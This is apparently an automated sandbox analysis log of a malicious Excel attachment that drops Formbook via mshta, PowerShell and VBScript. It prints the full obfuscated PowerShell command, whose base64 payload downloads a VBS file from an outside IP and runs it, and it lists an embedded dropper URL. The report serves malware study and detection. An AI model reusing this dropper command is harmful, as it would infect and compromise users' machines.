Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B163BF 13_2_00B163BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A963DB 13_2_00A963DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A72305 13_2_00A72305
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00ABA37B 13_2_00ABA37B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AF443E 13_2_00AF443E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AF05E3 13_2_00AF05E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A8C5F0 13_2_00A8C5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AB6540 13_2_00AB6540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A74680 13_2_00A74680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A7E6C1 13_2_00A7E6C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B12622 13_2_00B12622
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00ABA634 13_2_00ABA634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A7C7BC 13_2_00A7C7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A9286D 13_2_00A9286D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A7C85C 13_2_00A7C85C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A729B2 13_2_00A729B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B1098E 13_2_00B1098E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B049F5 13_2_00B049F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A869FE 13_2_00A869FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00ABC920 13_2_00ABC920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B1CBA4 13_2_00B1CBA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AF6BCB 13_2_00AF6BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B12C9C 13_2_00B12C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AFAC5E 13_2_00AFAC5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AA0D3B 13_2_00AA0D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A7CD5B 13_2_00A7CD5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AA2E2F 13_2_00AA2E2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A8EE4C 13_2_00A8EE4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B0CFB1 13_2_00B0CFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AE2FDC 13_2_00AE2FDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A80F3F 13_2_00A80F3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A9D005 13_2_00A9D005
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AED06D 13_2_00AED06D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A73040 13_2_00A73040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A8905A 13_2_00A8905A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AFD13F 13_2_00AFD13F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B11238 13_2_00B11238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A6F3CF 13_2_00A6F3CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A77353 13_2_00A77353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A81489 13_2_00A81489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AA5485 13_2_00AA5485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AAD47D 13_2_00AAD47D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B135DA 13_2_00B135DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A7351F 13_2_00A7351F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AF579A 13_2_00AF579A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AA57C3 13_2_00AA57C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B0771D 13_2_00B0771D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B0F8EE 13_2_00B0F8EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AEF8C4 13_2_00AEF8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AF394B 13_2_00AF394B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AF5955 13_2_00AF5955
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B23A83 13_2_00B23A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A6FBD7 13_2_00A6FBD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AFDBDA 13_2_00AFDBDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A97B00 13_2_00A97B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00B0FDDD 13_2_00B0FDDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00AFBF14 13_2_00AFBF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00A9DF7C 13_2_00A9DF7C
Source: PI#0034250924.xla.xlsx OLE indicator, VBA macros: true
Source: PI#0034250924.xla.xlsx Stream path 'MBd0019C635/\x1Ole' : https://og1.in/Ts9zje%kH2PtB@h']}kcoW8urgju7qSIyaY6rMfoRvqJjFI1MRxDhJ0cgZCOILDjTfxNUj50KG2ed9pKmaMFcHRLPB6jFvTt3m12GrIMTshxM4f1f2xwH0Kkfjk36FCfVkQuag2tuZ2peUDjVhwE8iqQxTFkHUBeJah92hLjWBFYZUL5ldm7b9N)BhA0<mXm'_
Source: F7A30000.0.dr Stream path 'MBD0019C635/\x1Ole' : https://og1.in/Ts9zje%kH2PtB@h']}kcoW8urgju7qSIyaY6rMfoRvqJjFI1MRxDhJ0cgZCOILDjTfxNUj50KG2ed9pKmaMFcHRLPB6jFvTt3m12GrIMTshxM4f1f2xwH0Kkfjk36FCfVkQuag2tuZ2peUDjVhwE8iqQxTFkHUBeJah92hLjWBFYZUL5ldm7b9N)BhA0<mXm'_
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00A6DF5C appears 137 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00ADF970 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00AB3F92 appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00AB373B appears 253 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: String function: 00A6E2A8 appears 60 times
Source: temp_exec.exe.11.dr Static PE information: No import functions for PE file found
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: temp_exec.exe.11.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 12.2.temp_exec.exe.2bc9ae0.2.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 12.2.temp_exec.exe.8e0000.0.raw.unpack, cb2e7c6ba8be0ef5b6ef7a92b800a3bbc.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@16/21@2/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PI#0034250924.xla.xlsx
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8E88.tmp
Source: PI#0034250924.xla.xlsx OLE indicator, Workbook stream: true
Source: F7A30000.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: PI#0034250924.xla.xlsx ReversingLabs: Detection: 18%
Source: PI#0034250924.xla.xlsx Virustotal: Detection: 23%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'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'+[ChAr]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: wow64cpu.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdbhP\ source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdb source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
Source: F7A30000.0.dr Initial sample: OLE indicators vbamacros = False
Source: PI#0034250924.xla.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation

barindex
Source: 12.2.temp_exec.exe.2bc9ae0.2.raw.unpack, c4b3fc756b99a7f509fc28017328f4772.cs .Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])
Source: 12.2.temp_exec.exe.8e0000.0.raw.unpack, c4b3fc756b99a7f509fc28017328f4772.cs .Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'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'+[ChAr]34+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'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'+[ChAr]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899C022D push eax; iretd 7_2_000007FE899C0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899C00BD pushad ; iretd 7_2_000007FE899C00C1
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Code function: 12_2_000007FE8B6500BD pushad ; iretd 12_2_000007FE8B6500C1
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe Code function: 12_2_000007FE8B6500CD pushad ; iretd 12_2_000007FE8B6500C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 13_2_00407041 push cs; iretd 13_2_00407042
